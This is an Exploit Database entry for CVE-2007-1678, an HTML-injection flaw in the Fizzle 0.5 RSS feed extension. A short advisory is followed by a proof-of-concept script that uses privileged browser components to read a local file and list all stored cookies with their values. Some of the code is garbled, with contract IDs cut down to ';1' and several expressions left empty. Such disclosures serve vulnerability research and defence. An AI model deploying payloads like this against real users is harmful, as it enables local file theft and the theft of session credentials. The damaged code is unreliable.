Fizzle 0.5 RSS Feed HTML Injection Vulnerability

ID EDB-ID:29783
Type exploitdb
Reporter CrYpTiC MauleR
Modified 2007-03-26T00:00:00


Fizzle 0.5 RSS Feed HTML Injection Vulnerability. CVE-2007-1678. Webapps exploit for php platform


Fizzle is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.

Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

This issue affects version 0.5; other versions may also be affected.

- ------------------------------------------------------------------------- POC: Local File Reading and Cookie Reading (The HTML entities MUST be used) - ------------------------------------------------------------------------- <script> function read(readfile) { var file = Components.classes[";1"] .createInstance(Components.interfaces.nsILocalFile); file.initWithPath(readfile); var is = Components.classes[";1"] .createInstance(Components.interfaces.nsIFileInputStream); is.init(file, 0x01, 00004, null); var sis = Components.classes[";1"] .createInstance(Components.interfaces.nsIScriptableInputStream); sis.init(is); var output =; alert(output); } read("C:\test.txt"); function getCookies() { var cookieManager = Components.classes[";1"] .getService(Components.interfaces.nsICookieManager); var str = ''; var iter = cookieManager.enumerator; while (iter.hasMoreElements()) { var cookie = iter.getNext(); if (cookie instanceof Components.interfaces.nsICookie) { str += "Host: " + + "\nName: " + + "\nValue: " + cookie.value + "\n\n"; } } alert(str); } getCookies() </script>